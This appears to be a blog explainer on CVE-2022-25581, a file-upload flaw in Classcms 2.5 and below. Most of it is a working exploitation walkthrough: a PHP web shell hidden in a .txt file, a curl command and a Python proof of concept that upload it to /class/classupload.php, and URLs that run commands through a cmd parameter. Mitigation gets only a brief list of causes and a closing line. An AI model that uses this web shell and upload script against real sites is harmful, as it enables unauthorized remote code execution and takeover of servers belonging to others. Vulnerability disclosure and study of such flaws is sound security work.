In today’s digital age, website security remains a pressing challenge, especially for content management systems (CMS) deployed all over the web. In early 2022, a critical vulnerability was discovered in Classcms version 2.5 and below, tracked as CVE-2022-25581. This flaw affects the way files are uploaded in the classupload component, opening the door for attackers to inject and execute arbitrary code—just by uploading a specially crafted .txt file.
In this article, we break down CVE-2022-25581, explain how exploitation works, and discuss steps for mitigation. This guide is written in simple, straightforward language, with practical code snippets and references for verification.
What is Classcms?
Classcms is a popular, open-source content management system used primarily by small to medium-sized websites for easy site building.
Where’s the Hole?
The vulnerability centers on the classupload component located at /class/classupload.php. Its upload feature was designed to let users upload images or other files. However, it failed to properly verify the actual contents of uploaded files. Even if you named your file something like shell.txt, you could smuggle malicious code inside—and the server would *process* it!
The critical mistake? The server mistakenly trusts file extensions and skips deep inspection.
Original Reference
Upload the File:
Use the vulnerable /class/classupload.php to upload evil.txt. The script fails to validate the file content or enforce correct content types.
Access the File:
Later, you access the uploaded TXT file via your browser or HTTP request. If the webserver is misconfigured, it will execute the embedded PHP code!
Gain Remote Control:
The attacker now runs code on your site with the webserver’s permissions, potentially taking over the whole server.
Let’s make a simple PHP web shell in a txt file
<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
Here’s a sample curl command to send the file to the target website
curl -F "file=@evil.txt" http://target-site.com/class/classupload.php
*Replace target-site.com with the actual vulnerable website’s address.*
If successful, the server now stores evil.txt in the upload directory. Suppose it’s saved as /upload/evil.txt.
To execute your code, open the txt file in your browser like so
http://target-site.com/upload/evil.txt?cmd=whoami
If the server is improperly configured to parse .txt files as PHP, your command runs, and you now control the host!
Here’s a full Python proof-of-concept (PoC)
import requests
url = 'http://target-site.com/class/classupload.php'
files = {'file': ('evil.txt', "<?php system($_GET['cmd']); ?>")}
response = requests.post(url, files=files)
print(response.text)
Once uploaded, visit
http://target-site.com/upload/evil.txt?cmd=ls
Why This Happens
- No Content Validation: The upload script does not inspect the file content or use allowed MIME types.
- Trusting Extensions: It trusts the file extension, but server misconfiguration can treat .txt as executable PHP.
- Improper Server Configurations: Some setups (misconfigured Apache/Nginx) execute uploaded files as scripts.
Conclusion
CVE-2022-25581 is a classic example of how tiny oversights in file upload logic can leave entire websites vulnerable to full takeover. With a simple text file, an attacker could run code on an unpatched Classcms install. Always sanitize file uploads and keep your software up-to-date!
References
- CVE-2022-25581 on Mitre
- Exploit details on Exploit-DB
- Classcms Official Releases
Timeline
Published on: 03/18/2022 23:15:00 UTC
Last modified on: 03/28/2022 18:24:00 UTC